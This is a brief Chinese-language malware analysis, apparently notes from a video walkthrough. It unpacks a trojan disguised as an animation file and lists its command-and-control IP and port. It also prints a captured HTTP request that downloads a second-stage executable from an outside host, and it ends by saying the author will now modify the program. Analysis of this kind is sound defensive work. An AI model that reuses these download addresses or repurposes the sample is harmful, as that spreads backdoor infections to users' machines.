动画介绍:北京.exe这个就是看操作看到了,好像是鸽子哦
61.173.4.48 和 端口 8000.
FSG 2.0 -> bart/xt 这下脱壳了,然后就可以随意改但还没完,看后门程序!
看到了,连像一ip
抓包看
GET /37.exe HTTP/1.1..Accept: */*..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)..Host: ttqq.nease.net..Connection: Keep-Alive....
ttqq.nease.net/37.exe 这就是后门地址以及下载后保存的地址
看这次还连接网络不
好了不连了下面我们来改一下这个软件吧! |